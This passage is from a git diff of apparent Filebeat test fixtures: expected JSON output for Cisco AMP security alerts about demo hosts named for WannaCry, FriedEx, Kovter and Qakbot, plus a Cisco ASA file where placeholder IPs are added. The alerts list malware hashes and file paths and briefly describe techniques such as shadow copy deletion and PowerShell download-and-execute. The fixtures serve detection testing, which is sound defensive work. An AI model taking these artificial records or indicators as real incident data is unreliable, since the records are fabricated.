"Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40302, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503301", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41422, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437902", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 893000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 42542, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437899", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 456000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503299", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45179, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 957000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 46299, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179209167470598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47663, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49034, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.MAP.Ransomware.rewrite", + "cisco.amp.detection_id": "6583840593074454529", + "cisco.amp.event_type_id": 1090519105, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 231000000, + "event.action": "Malicious Activity Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6583840597369422000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "75a758a0c5cea48c9922d64a113d0f9d", + "file.hash.sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "file.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "file.name": "mscorsvw.exe", + "file.path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52012, + "process.hash.md5": "71c85477df9347fe8e7bc55768473fca", + "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "process.name": "services.exe", + "process.pid": 480, + "related.hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:30.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 182000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6701398782847286000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:59:30.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 53662, + "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:55:07.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 260000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136036637603000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:55:07.000Z", + "file.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "file.name": "cmd.exe", + "file.path": "file:///C%3A/Windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 55441, + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "related.hash": [ + "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 250000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066250000100, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 57151, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 228000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066228000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 58928, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647106", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 60601, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 61802, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index d4f28f46510..3f2882e1f74 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -45,7 +45,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -103,7 +105,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -151,6 +155,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -285,6 +290,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -340,7 +346,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -615,6 +623,7 @@ ], "related.ip": [ "10.10.10.10", + "8.8.8.8", "192.168.2.2" ], "service.type": "cisco", @@ -749,6 +758,7 @@ ], "related.ip": [ "10.192.46.90", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -796,6 +806,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -909,6 +920,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -1237,7 +1249,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1295,7 +1309,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": 